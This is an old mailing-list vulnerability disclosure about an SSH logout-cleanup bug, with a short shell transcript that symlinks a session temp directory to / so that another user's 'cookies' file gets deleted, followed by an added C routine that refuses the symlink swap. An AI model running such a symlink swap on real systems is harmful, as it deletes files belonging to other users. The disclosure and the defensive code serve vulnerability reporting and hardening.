Date: Mon, 4 Jun 2001 22:14:29 +1200 (NZST)
From: [email protected]
To: [email protected]
Subject: SSH allows deletion of other users files...

SSH allows deletion of other users files.
You can delete any file on the filesystem you want...
as long as it's called cookies.
Not really a very useful bug, but could cause annoyances to
people who actually like their cookies.
/home/zen/.netscape/cookies
sample exploit:-
[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory
--zen-parse
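
Added example, not part of the original post and not code from any SSH implementation: the transcript above shows cleanup at logout following a symlink placed at the session's temp-directory path. One way a privileged cleanup routine can refuse that swap, in C; safe_remove_in_dir, demo_symlink_swap and the paths used are hypothetical names and constructed test data.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Remove `name` from `dir` only if `dir` is a real directory (not a symlink)
 * owned by `owner`. Returns 0 on success, -1 on refusal or error. */
int safe_remove_in_dir(const char *dir, const char *name, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW: fail if the final path component is a symlink. */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0)
        return -1;
    /* Check the object actually opened, not the path name. */
    if (fstat(dfd, &st) != 0 || !S_ISDIR(st.st_mode) || st.st_uid != owner) {
        close(dfd);
        return -1;
    }
    /* Unlink relative to the verified descriptor, so a later swap of the
     * path name cannot redirect the call. */
    int rc = unlinkat(dfd, name, 0);
    close(dfd);
    return rc == 0 ? 0 : -1;
}

/* Constructed scenario: "victim" holds a cookies file, "sess" stands in for
 * the per-session directory after the swap. Returns 1 if the cleanup is
 * refused through the symlink and still works on the real directory. */
int demo_symlink_swap(void)
{
    char base[] = "/tmp/cleanup-demo-XXXXXX", victim[64], file[128], sess[64];
    if (!mkdtemp(base)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", base);
    snprintf(file, sizeof file, "%s/cookies", victim);
    snprintf(sess, sizeof sess, "%s/sess", base);
    int fd = mkdir(victim, 0700) == 0 ? open(file, O_CREAT | O_WRONLY, 0600) : -1;
    if (fd < 0 || close(fd) != 0 || symlink(victim, sess) != 0) return -1;
    int refused = safe_remove_in_dir(sess, "cookies", geteuid()) == -1;
    int survived = access(file, F_OK) == 0;
    int removed = safe_remove_in_dir(victim, "cookies", geteuid()) == 0;
    unlink(sess); rmdir(victim); rmdir(base);   /* tidy up the demo tree */
    return refused && survived && removed;
}

int main(void) { return demo_symlink_swap() == 1 ? 0 : 1; }
```

O_NOFOLLOW covers only the last path component, so the parent directory of the session path still has to be one that other users cannot rename or replace.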